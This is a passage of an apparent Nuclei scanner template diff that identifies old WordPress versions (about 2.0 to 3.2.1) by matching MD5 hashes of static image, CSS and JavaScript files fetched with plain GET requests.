+ - "{{BaseURL}}/wp-includes/images/pdf.png" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"65d6fc1f8c488839ed18da9542002271\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/audio.png" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"a0fe1ae5c188baadbba60db814bdcf2b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/js.png" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"cd985c7f9dc16f22b6a089162f9f9b49\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/html.png" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"56971a813ffec45a9caac9fa0820ba5f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/autosave/readme.txt" + matchers: + - type: dsl + name: 2.0 - 2.6.5 + dsl: + - "(\"fe81b122bcf0e8599bb841cca33f967a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/tiny_mce_ext.js" + matchers: + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"5e97d9bfadfbaabaa0b26b61c45a400d\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"5c90444da969c6153d334429897306b1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/comment-stalk-fresh.gif" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"15674fa43f78721d5b3ad896dc00aaf1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/comment-stalk-classic.gif" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"c2ff7e39c4531f19f7cca9e1c173664f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/tab.png" + matchers: + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"66dc0e9e049f03a553edef7050a25ef7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/media-buttons.gif" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"61c46617871c3d07bf3e6a82488776fc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/gear.png" + matchers: + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"2e7caff6bd79185a893c8f2d71a2bf85\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/comment-pill.gif" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"42b039a8868185213bfa6b5a0c71f563\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/comment-stalk-rtl.gif" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"a1a86519bed554d2e9e4af526c642e25\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/media-button-gallery.gif" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"d2dddcf3d5a7553c246e967d3c149fc5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/tail.gif" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"b93de208dc82124aab27a0300cef5816\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/press-this-ie.css" + matchers: + - type: dsl + name: 2.6.2 - 2.6.5 + dsl: + - "(\"1ffbb45a7cc8a96c335ba18973704905\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.1 + dsl: + - "(\"e9129420be8a404147faf2a2de4fc9e9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/upload-rtl.css" + matchers: + - type: dsl + name: 2.3 - 2.6.5 + dsl: + - "(\"c9106b5fd9fa57f1151e8eede647aef1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/upload.js" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"44433c60fe6569e064febe62096bc9a5\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"bca00b7ab1d7a535f30aec6489fa4e1c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/swfupload/swfupload_f9.swf" + matchers: + - type: dsl + name: 2.5 - 2.7.1 + dsl: + - "(\"8ee900948d38bbcdd1a10c7b3221cce6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/swfupload/plugins/swfupload.documentready.js" + matchers: + - type: dsl + name: 2.5 - 2.7.1 + dsl: + - "(\"9cbece0f8f4192b636f5484d4ddf63cc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/swfupload/plugins/swfupload.graceful_degradation.js" + matchers: + - type: dsl + name: 2.5 - 2.7.1 + dsl: + - "(\"57901feb399ab92498cbe8ef193bf832\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/css/blank.css" + matchers: + - type: dsl + name: 2.5 - 2.7.1 + dsl: + - "(\"c15c875a4c54efa8554bca63aee6ecb9\" == md5(body))" + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"e873e4b2d1c926891df13afca4f73e49\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/css/pasteword.css" + matchers: + - type: dsl + name: 2.5 - 2.7.1 + dsl: + - "(\"2042313f6628ef2b742c74aba0fd9b60\" == md5(body))" + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"e1dfc4d39541876eae65975a6febf6cc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/autosave/editor_plugin.js" + matchers: + - type: dsl + name: 2.5 - 2.7.1 + dsl: + - "(\"f54e4df3a63237afd7471c95d8484f6e\" == md5(body))" + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"0b28d9f27e1f3c8d817aeb31bcb352af\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"a4394be567c66e0cfb88b32cb6369a85\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"f85d3b49bea0be6fdfb9b0fc8c76140c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/utils/mclayer.js" + matchers: + - type: dsl + name: 2.5 - 2.7.1 + dsl: + - "(\"8885fea7b48a56b5e50e7c7368122f2f\" == md5(body))" + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"70718596a2b1f3dc07b83cf1ca0a22b9\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"e4572e78780966da5d48445a63ddd226\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/users.js" + matchers: + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"0c2b99ed1de562e31325078f398d3189\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"d9f70a2fc3218dd1e7dc47d397d37d36\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"ef8872688bcab72a712e681b5bdd0c36\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/slug.js" + matchers: + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"6856b5d635ea0863e4a0531df329c8ae\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"8d05ddd4fed8e7fc5bd6a9aa254184c2\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"60d61478be0a8c0178fffeefac7c4feb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/slug.dev.js" + matchers: + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"216b3181cccbf143cef4cae1d09dcb1d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/page.js" + matchers: + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"d8613d8d5318ca18f488428db7e0d97f\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"5f4e644bb3e0efe9b40e562cd9662bbd\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"d345cbe714be44a04d926a9e470782c7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/page.dev.js" + matchers: + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"d94c023c0c18b0900218f78b9aad9d3b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/scriptaculous/prototype.js" + matchers: + - type: dsl + name: 2.5 - 2.9.2 + dsl: + - "(\"bab4179aef164e96e866b03ac432bdf7\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"3766aeff5778b54f74f93670322ca0df\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"ed2d6608b0832c5e990e10729157b485\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"e4d323d8dfe7260fe01cefe6143f094d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/engines/gecko.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"7c956d369c49985b58dd290d34582219\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/engines/opera.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"f74fa89f8ad2fb9a181a208f10da7b85\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/engines/msie.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"f3b838bc550dc9bc558227fafce84533\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/codepress.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"aa0c74b76c8cc60de8737d59cb0e7cdf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/images/line-numbers.png" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"a76c9f4012abdcc34f6a5f7e5a192a8e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/html.css" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"7c2c3977b42d65c155c8478d7b6daf51\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/csharp.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"83dca53adedd600821680a056d250d52\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/sql.css" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"02f092e68dc9db24938f5eeb3d5c8567\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/css.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"aa387749d0225b801966586cb3440feb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/javascript.css" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"dcf899b8e094d6ce00f862ccd29cd757\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/java.css" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"12bc23938841da78e58634abf6496878\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/asp.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"26687456026882c672818c7ecb60a15a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/java.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"790af578062b6477d836e3fb2a7649c0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/autoit.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"8d361eab73d9102e860ffefe4e4f8c6a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/html.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"fb2ded83464c3fe2f1e5b637040a3a94\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/javascript.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"4d5da44c9fa9ecadf7798348216e9ffb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/text.css" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"abaac598019c3320c840d668e3e51f29\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/vbscript.css" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"73dca79fa86f18c94570e0e1cfc62aae\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/autoit.css" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"d41bb2cf55d7c5c7e47dfe3e4d86db0b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/perl.css" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"dfb384ec9b7e486a00395c1e770a34f9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/ruby.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"91e8cd2f56bca1c8f494b3be0625a0d6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/text.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"870cfa7de88e106a459a97e65cbe4663\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/php.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"62832f855a526454f812e8b67ad826e6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/css.css" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"7c645111eabe8877ad347cee16e592bf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/csharp.css" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"983220b0ee96cb5b166de574ad989d93\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/vbscript.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"26687456026882c672818c7ecb60a15a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/ruby.css" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"271da30b0a22637d4c255abb60644870\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/xsl.css" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"07599e630b9c2c13da05e32cddc0033e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/xsl.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"9c7b6a5314b3cee0810447d6f65156e9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/generic.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"8ab6d398feb9e9c1c77525143f05ec74\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/sql.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"0dba07c9dc503965d361f900d3eac5a1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/generic.css" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"e971d7976986a2fb16f492975170bb22\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/asp.css" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"2d4b45ac584d7baa65fd044b523161c6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/php.css" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"9b73eec0ab489d7cd832fc01dac0d448\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/languages/perl.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"e98daf8aeacba58424d112e3f6e593c8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/codepress.css" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"9ac88960aa13b291891f128267233040\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/license.txt" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"adc05bf63f3776f4f7c2950825b770a9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/codepress/codepress.html" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"930e281d2080dfe3e2d1cacedca458d7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/interface.js" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"6bc3151d1902096d20d92f6042f85757\" == md5(body))" + - type: dsl + name: 2.5 - 2.7.1 + dsl: + - "(\"6d4f57b9e6ac9be29d676f255f42af5b\" == md5(body))" + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"847407c01f884853efd73974931e2195\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/rtl.dev.css" + matchers: + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"f8e96e1e87c798f8163b951a06401179\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/browse-happy.gif" + matchers: + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"3bad5ccecc83f7e368c79bc7f961e337\" == md5(body))" + - type: dsl + name: 2.0 - 2.6.5 + dsl: + - "(\"119997784c78f5b652718aa83d91f0d6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/fav-top.png" + matchers: + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"6d51aeeb995d529ea74d3339c8fd826b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/wp-logo.gif" + matchers: + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"797be4dafa9e042735e030df67ec0f26\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screen-options-left.gif" + matchers: + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"1f4510095793f25a12c376f136429880\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/wp-logo-vs.gif" + matchers: + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"4a094808ccb90b388ac92611d6e9e365\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/wp-gears.dev.js" + matchers: + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"d97f6085669659c709b6e285ae9ce98a\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"56bb1aec2083a149e8b0dbab78eccdf2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/safari/editor_plugin.js" + matchers: + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"9bf27e117e423eea7754fb6e471276ee\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"9d7a37a26a6773ae236ed7a75f4617da\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"e22fe4b5a129c551ebbb856f1f3f31e2\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"c079c4b2c39f0bc31b4e6350db2ca4aa\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/safari/blank.htm" + matchers: + - type: dsl + name: 2.5 - 3.0.6 + dsl: + - "(\"c9a4909a579f24cd23fc0ae847e06241\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/img/quicktime.gif" + matchers: + - type: dsl + name: 2.5 - 3.0.6 + dsl: + - "(\"9a6a9fdead205b125c07ea37e71ed4f1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/img/shockwave.gif" + matchers: + - type: dsl + name: 2.5 - 3.0.6 + dsl: + - "(\"baa643b587565755157618032dc93e3c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/img/realmedia.gif" + matchers: + - type: dsl + name: 2.5 - 3.0.6 + dsl: + - "(\"b9734ee16d790e67bea01046feba28b7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/img/trans.gif" + matchers: + - type: dsl + name: 2.5 - 3.0.6 + dsl: + - "(\"12bf9e19374920de3146a64775f46a5e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/img/flash.gif" + matchers: + - type: dsl + name: 2.5 - 3.0.6 + dsl: + - "(\"6c69b02015d09280332ff8b07e4ea2f3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/img/windowsmedia.gif" + matchers: + - type: dsl + name: 2.5 - 3.0.6 + dsl: + - "(\"c327cd167b3a7bc263d908b0d0154ead\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/img/flv_player.swf" + matchers: + - type: dsl + name: 2.5 - 3.0.6 + dsl: + - "(\"fe011e9725b2722b59bb8ef4991bf6bb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/media/css/content.css" + matchers: + - type: dsl + name: 2.5 - 3.0.6 + dsl: + - "(\"ebcad73e7f6785a308328129aa90d5cb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/blank.htm" + matchers: + - type: dsl + name: 2.5 - 3.0.6 + dsl: + - "(\"f3519538055a4d1fdbe39fb84def65a5\" == md5(body))" + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"a35859a0902cbc290d6638823d50df88\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screen-options-right.gif" + matchers: + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"44b706f5027137aa6d58a6226a4fecdc\" == md5(body))" + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"ae671f7223fff3a47375d47a4bcf587f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/button-grad-active-vs.png" + matchers: + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"60f72449e40ee8a8d6bef4e8ed0260fd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/list-vs.png" + matchers: + - type: dsl + name: 2.7 - 3.0.6 + dsl: + - "(\"978f0351d99a761bdafd313e76201be9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/button-grad-vs.png" + matchers: + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"c614f82ed58080d37618cc1839e4ce02\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/fav-arrow-vs.gif" + matchers: + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"a80771dd731c047e5dbbee8829163e82\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/visit-site-button-grad-vs.gif" + matchers: + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"4fd90308cccfc4fe131b07df35be96d4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/fav-arrow-vs-rtl.gif" + matchers: + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"ac1697376f9765b1e8846f0601938243\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/visit-site-button-grad.gif" + matchers: + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"75e555e701dd658659474dfb3a70e851\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/fav-top-vs.gif" + matchers: + - type: dsl + name: 2.8 - 3.0.6 + dsl: + - "(\"0b16e5449ce8cd8fc7c7412f385e9edc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/screen-options-right-up.gif" + matchers: + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"f645b789be33f81da8fdca5aedecc97e\" == md5(body))" + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"745eebb21d33c943adbfea7bc6d37aa4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/fm.gif" + matchers: + - type: dsl + name: 2.5 - 3.1.4 + dsl: + - "(\"ac4a63cad5d195d24ec4c91121e9be2f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/img/sflogo.png" + matchers: + - type: dsl + name: 2.5 - 3.1.4 + dsl: + - "(\"18cbf7ea0ccc1d0aa42260aa9787af6f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/img/help.gif" + matchers: + - type: dsl + name: 2.5 - 3.1.4 + dsl: + - "(\"4cd4a5d2cdcd74c8aeced17813afd6ea\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/img/more.gif" + matchers: + - type: dsl + name: 2.5 - 3.1.4 + dsl: + - "(\"dff3bc0a01a614b601b7826415bfe4ca\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/img/toolbars.gif" + matchers: + - type: dsl + name: 2.5 - 3.1.4 + dsl: + - "(\"33e46a907572061c981e459ae022b40d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/star.gif" + matchers: + - type: dsl + name: 2.7 - 3.1.4 + dsl: + - "(\"53b4445439bcf04aa36901548e379f12\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/logo-login.gif" + matchers: + - type: dsl + name: 2.7 - 3.1.4 + dsl: + - "(\"c62e03cf2e9417e6019657b3f5379802\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"47de928cafe74515a762f12a772c4823\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/list-table.dev.js" + matchers: + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"b46a2638e88cb46acf8e49adb4622621\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/list-table.js" + matchers: + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"4ade95840705b173a03fc072e782ef9d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/admin-bar-sprite-rtl.png" + matchers: + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"6c1fbae84aab492cd1fff36c7f0e454d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/l10n.js" + matchers: + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"d64dc5dca841a048946621b935e540a3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/l10n.dev.js" + matchers: + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"790e0e24a1f8061d75e8af6e4a8b6f9b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui.draggable.js" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"58fe07c845c4146d80ce929bcaccecc1\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"f1555bd3272ddfa24ce25de7090ceb21\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"e506c249ba3ba3bcf5468c4db2f1cd61\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"10f4e2da1843f09b7398217ce96402e2\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"151b6a710a60834b376d87dc81d38187\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui.position.js" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"eda7e30312f7f5330fa88a1a9a1c31df\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"a5fa42980074a99f53059597069d2077\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui.core.js" + matchers: + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"4688f380b9e0021db778a38ca0f5df6f\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"3d98d20c912618e3519321a81d5829b0\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"73359044f78d5055ce92d835f71ca8bc\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"77081f376fc4bc59694d88000fba7c3c\" == md5(body))" + - type: dsl + name: 